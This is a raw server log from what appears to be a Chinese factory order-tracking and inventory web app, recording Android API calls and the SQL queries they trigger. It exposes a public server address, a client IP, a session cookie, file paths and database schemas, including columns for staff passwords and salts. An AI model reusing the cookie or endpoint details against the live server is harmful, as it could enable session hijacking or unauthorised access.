File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001094s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001487s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000555s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000893s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 24 LIMIT 1 [ RunTime:0.000438s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000952s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000918s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1765701493>orderinfo.end_time desc,1765701493>orderinfo.end_time desc,1765701493-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.024473s ] --------------------------------------------------------------- [ 2025-12-14T16:38:14+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018482s][吞吐率:54.11req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001126s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:14+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.024163s][吞吐率:41.39req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001962s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:16+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&keywords=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&keywords=&offset=0&pageNum=10 [运行时间:0.081367s][吞吐率:12.29req/s] [内存消耗:5,464.32kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001193s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'keywords' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001645s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000524s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000899s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000643s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000453s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001050s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000700s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.025803s ] --------------------------------------------------------------- [ 2025-12-14T16:38:16+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [运行时间:0.080195s][吞吐率:12.47req/s] [内存消耗:5,464.64kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001177s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001542s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000387s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000836s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000675s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000402s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000979s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000711s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.025348s ] --------------------------------------------------------------- [ 2025-12-14T16:38:16+08:00 ] 39.144.91.198 POST /api/order/getFahuoDanListById?userId=24 [ info ] 47.105.33.115:8081/api/order/getFahuoDanListById?userId=24 [运行时间:0.069369s][吞吐率:14.42req/s] [内存消耗:5,430.66kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001091s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getFahuoDanListById', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '24', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001974s ] [ info ] [ RUN ] app\api\controller\Order->getFahuoDanListById[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000385s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000867s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000708s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000442s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000971s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000691s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000754s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `orderinfo`.`kehu_id`=`kehu`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.send_amount > 0 and orderinfo.kehu_id != 0 ) ORDER BY `orderinfo`.`updatetime` DESC [ RunTime:0.021875s ] --------------------------------------------------------------- [ 2025-12-14T16:38:18+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021691s][吞吐率:46.10req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001139s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:19+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020217s][吞吐率:49.46req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001136s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:22+08:00 ] 39.144.91.198 POST /api/kuguan/order/updaterukuliangbyid?staff_id=24&orderId=53632&rukuliang=21&fpsl=0 [ info ] 47.105.33.115:8081/api/kuguan/order/updaterukuliangbyid?staff_id=24&orderId=53632&rukuliang=21&fpsl=0 [运行时间:0.121827s][吞吐率:8.21req/s] [内存消耗:5,067.65kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001200s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'updaterukuliangbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderId' => '53632', 'rukuliang' => '21', 'fpsl' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001596s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->updaterukuliangbyid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000492s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000833s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 24 LIMIT 1 [ RunTime:0.000327s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001283s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE `id` = 53632 LIMIT 1 [ RunTime:0.000480s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000758s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 554 LIMIT 1 [ RunTime:0.000326s ] [ sql ] [ SQL ] UPDATE `ot_productinfo` SET `kucun`=21,`updatetime`=1765701502 WHERE `id` = 554 [ RunTime:0.000330s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000925s ] [ sql ] [ SQL ] SELECT 